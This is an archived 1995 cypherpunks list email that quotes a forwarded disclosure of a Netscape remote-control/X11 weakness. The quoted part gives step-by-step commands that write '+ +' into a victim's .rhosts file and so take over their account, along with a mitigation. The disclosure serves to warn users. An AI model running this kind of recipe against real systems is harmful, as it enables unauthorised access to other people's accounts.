From: sameer <sameer@c2.org>
To: jk@digit.ee (Jyri Kaljundi)
Message Hash: 18b28ecf21807bd8fcf4f2cc7858cf5c8fce0980b9d90b7a6506ae2d30fafcfc
Message ID: <199509291644.JAA07516@infinity.c2.org>
Reply To: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
UTC Datetime: 1995-09-29 16:55:35 UTC
Raw Date: Fri, 29 Sep 95 09:55:35 PDT
From: sameer <sameer@c2.org>
Date: Fri, 29 Sep 95 09:55:35 PDT
To: jk@digit.ee (Jyri Kaljundi)
Subject: Re: Netscape hole without .Xauthority (fwd)
In-Reply-To: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
Message-ID: <199509291644.JAA07516@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain
That's called an X hole, not a netscape hole.
>
>
> Haven't seen this on the cypherpunks yet, sorry if this has been here=20
> already.=20
>
> Juri
>
> <o J=FCri Kaljundi e-mail: jk@digit.ee o<
> >o tel: +372 6308994 o>
> <o DigiTurg http://www.digit.ee/ o<
>
> ---------- Forwarded message ----------
>
> There's a huge hole in the Netscape remote control mechanism for the
> X-Windows based clients.=20
> Potential impact : anybody can become any user that uses Netscape on any
> system without sufficient X security.
>
> Let's suppose that you have an account on a target machine, where somebody
> is using Netscape, and either the xhost checking is disabled, or you can
> set the xhost yourself (e.g. if you have an account and the target user has
> no .Xauthority, as is frequent in university computer rooms).
> Then you can gain access to the target user's account using the following
> steps :
>
> - make a text file containing only "+ +" accessible (as file, as URL, or
> whatever you like) to the target Netscape client. This is quite easy, eit=
> her
> if you have a personal WWW page (http://... URL) or an account on the
> target machine (file://... URL), or even by uploading it to an anon FTP
>
> - set your DISPLAY environment variable to the target display
>
> - run the following set of commands :
>
> netscape -noraise -remote "openURL(<put-your-URL-here>)"
> netscape -noraise -remote "saveAs(.rhosts)"
> netscape -noraise -remote back
>
> In the second command, the path should be specified whenever possible=20
> (~ is not accepted).
>
> If the target user does not already have a .rhosts and is not looking at th=
> at
> precise moment, then the chances are it worked !
>
> Solution to the problem : every user concerned should either create a=20
> Xauthority file, or stop using Netscape.
>
> =09MXK
>
>
> PS: WHY do they bother with PGP and RSA security when they keep such holes =
> ????
>
> +------------------------------------+---------------------------------+
> | Denis AUROUX (MXK) | Ecole Normale Superieure |
> | 255 rue Saint-Jacques | 45 rue d'Ulm |
> | 75005 PARIS FRANCE | 75005 PARIS |
> | email: auroux@clipper.ens.fr | FRANCE |
> +------------------------------------+---------------------------------+
> | This .sig is SHAREWARE. If you use it often, please send me $50. |
> | After registering you will receive a fully functional .sig and all |
> | updates for free. |
> +----------------------------------------------------------------------+
>
--
sameer Voice: 510-601-9777
Community ConneXion FAX: 510-601-9734
An Internet Privacy Provider Dialin: 510-658-6376
http://www.c2.org (or login as "guest") sameer@c2.org
Return to October 1995
Return to “sameer <sameer@c2.org>”